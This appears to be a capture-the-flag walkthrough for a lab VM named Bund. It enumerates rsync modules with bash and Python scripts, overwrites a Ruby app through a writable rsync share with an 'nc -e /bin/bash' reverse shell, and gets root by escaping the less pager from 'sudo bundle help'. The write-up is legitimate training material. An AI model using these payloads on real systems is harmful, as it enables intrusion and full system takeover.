# Lab setup
Download: Bund
NAT, IP: 192.168.1.163
# Exploitation
# Initial information gathering
nmap service scan of the target:
```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.56 (Debian)
873/tcp  open  rsync   (protocol version 31)
9393/tcp open  http    WEBrick httpd 1.8.1 (Ruby 2.7.4 (2021-07-07))
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: WEBrick/1.8.1 (Ruby/2.7.4/2021-07-07)
```
RSYNC
rsync is a widely used open-source tool for synchronising files and directories between systems. It compares metadata of the source and destination (size, modification time) to decide which files need updating and then transfers only the changed parts, which saves bandwidth and speeds up synchronisation. It is normally driven from the command line and has many options, which makes it flexible and powerful.
An rsync daemon (port 873) exposes its shares as named modules, and you need a module name before you can list, pull or push anything. Unless the daemon lists its modules for you, the name has to be guessed, so write a bash script that tries candidates from a wordlist:
```bash
#!/bin/bash
# Try every line of directory.txt as an rsync module name on the target.
# "rsync host::module" with no destination just lists the module, so a
# zero exit status means the module exists and is readable.
directory="directory.txt"
IP="192.168.1.163"
if [ ! -f "$directory" ]; then
    echo "file $directory does not exist"
    exit 1
fi
while IFS= read -r line; do
    [ -z "$line" ] && continue
    printf 'Trying: %s\n' "$line"
    if rsync "$IP::$line" >/dev/null 2>&1; then
        printf '\n[*] Exists: %s\n' "$line"
        rsync "$IP::$line"   # show the listing for the hit, then stop
        exit 0
    fi
done < "$directory"
```
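The same enumeration without the rsync client, as an added example that is not part of the original writeup: it speaks the rsync daemon protocol directly over TCP 873. It first asks the daemon for its module list with `#list` (a daemon answers this unless a module is configured with `list = no`, which is exactly when dictionary probing is needed), then sends each candidate name and classifies the daemon's answer (`@RSYNCD: OK`, `@RSYNCD: AUTHREQD`, or `@ERROR: Unknown module`). The target address, port and wordlist path are assumptions taken from the writeup; `classify_reply` and `parse_module_list` are kept as pure functions so they can be checked offline.

```python
"""Enumerate rsync daemon modules by speaking the daemon protocol directly.

Added example for this writeup, not code from the original page. Assumptions:
the daemon listens on TCP 873 and speaks protocol 31 (as in the nmap output);
192.168.1.163 and "directory.txt" below are placeholders.
"""
import socket
import sys
from typing import Dict, Iterable, List

HANDSHAKE = b"@RSYNCD: 31.0\n"  # the client greets with its protocol version


def classify_reply(reply: str) -> str:
    """Classify the daemon's answer to a "<module>\\n" request.

    After the version exchange the daemon answers with one of:
      "@RSYNCD: OK"                -> module exists and needs no password
      "@RSYNCD: AUTHREQD <chal>"   -> module exists but requires a password
      "@ERROR: Unknown module ..." -> no such module
    Any other "@ERROR" (max connections, host denied) is reported as "error".
    MOTD lines, which do not start with "@", are skipped.
    """
    for line in reply.splitlines():
        line = line.strip()
        if line.startswith("@RSYNCD: OK"):
            return "ok"
        if line.startswith("@RSYNCD: AUTHREQD"):
            return "auth"
        if line.startswith("@ERROR: Unknown module"):
            return "unknown"
        if line.startswith("@ERROR"):
            return "error"
    return "error"


def parse_module_list(reply: str) -> List[str]:
    """Parse the answer to "#list\\n".

    The daemon prints one "name<padding>\\tcomment" line per listable module
    and closes with "@RSYNCD: EXIT". Modules configured with "list = no" are
    absent, which is why probe_wordlist() is still needed. A configured MOTD
    is printed before the list and cannot be told apart from module lines.
    """
    modules = []
    for line in reply.splitlines():
        if not line.strip() or line.startswith("@"):
            continue
        modules.append(line.split("\t", 1)[0].strip())
    return modules


def _talk(host: str, port: int, request: bytes, timeout: float = 5.0) -> str:
    """Connect, do the version handshake, send one request and read the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(HANDSHAKE)
        banner = sock.recv(64)  # e.g. b"@RSYNCD: 31.0\n"
        if not banner.startswith(b"@RSYNCD:"):
            raise RuntimeError(f"{host}:{port} is not an rsync daemon: {banner!r}")
        sock.sendall(request)
        chunks = []
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
                # After OK/AUTHREQD the daemon waits for our arguments, so stop reading.
                if any(tag in data for tag in (b"@RSYNCD: OK", b"@RSYNCD: AUTHREQD",
                                               b"@RSYNCD: EXIT", b"@ERROR")):
                    break
        except socket.timeout:
            pass
    return b"".join(chunks).decode("utf-8", "replace")


def list_modules(host: str, port: int = 873) -> List[str]:
    """Ask the daemon for its module list (empty if listing is disabled)."""
    return parse_module_list(_talk(host, port, b"#list\n"))


def probe_wordlist(host: str, candidates: Iterable[str], port: int = 873) -> Dict[str, str]:
    """Try each candidate as a module name; return {name: "ok" | "auth"} for hits."""
    hits = {}
    for name in candidates:
        name = name.strip()
        if not name or name.startswith("#"):
            continue
        verdict = classify_reply(_talk(host, port, name.encode() + b"\n"))
        if verdict in ("ok", "auth"):
            hits[name] = verdict
    return hits


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "192.168.1.163"
    wordlist = sys.argv[2] if len(sys.argv) > 2 else "directory.txt"
    print("listed modules:", list_modules(target))
    with open(wordlist, encoding="utf-8", errors="replace") as fh:
        for name, verdict in probe_wordlist(target, fh).items():
            print(f"[*] {name}: {verdict}")
```

Run it as `python3 rsync_enum.py 192.168.1.163 directory.txt`. A module reported as `auth` exists but is password-protected, which the page's bash loop would miss because `rsync host::module` fails on it; a module reported as `ok` can then be listed and pulled with the rsync client as the writeup does next.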
Fed a wordlist, the script turns up a module named fileadmin. List its contents:
```
┌──(root㉿kali)-[~]
└─# rsync -av --list-only rsync://192.168.1.163/fileadmin
receiving incremental file list
drwxrwxrwx          4,096 2023/05/27 10:40:29 .
-rwxrwxrwx             14 2023/05/27 06:00:12 Gemfile
-rwxrwxrwx            370 2023/05/27 06:01:38 Gemfile.lock
-rwxrwxrwx             75 2023/05/27 10:30:25 app.rb

sent 20 bytes  received 110 bytes  260.00 bytes/sec
total size is 459  speedup is 3.53
```
This is the source of the Ruby app on port 9393, and everything in the module is mode 777. Pull app.rb, replace its body with a reverse shell, and push it back over the same module (this only works because the daemon lets us write to the module, not just read it):
```
┌──(root㉿kali)-[~/bund]
└─# rsync 192.168.1.163::fileadmin/app.rb .
```
```ruby
require 'sinatra'
require 'shotgun'   # Rack reloader: the app is reloaded on every request, so the
                    # replaced file runs without restarting the server (9393 is
                    # shotgun's default port)

get '/' do
  # reverse shell to the attacking host; needs a netcat build that supports -e
  `nc -e /bin/bash 192.168.1.129 4444`
end
```
```
┌──(root㉿kali)-[~/bund]
└─# rsync app.rb 192.168.1.163::fileadmin
```
Start a listener on port 4444 on the attacking host, then request http://192.168.1.163:9393.
The shell calls back.
# Privilege escalation
```
sudo -l
```
shows that `bundle` may be run with sudo. Run `sudo bundle help`: the help text is shown through a pager (less), and less executes a line starting with `!` as a shell command, so typing `!/bin/bash` at the pager prompt spawns a shell that inherits root.
This yields root.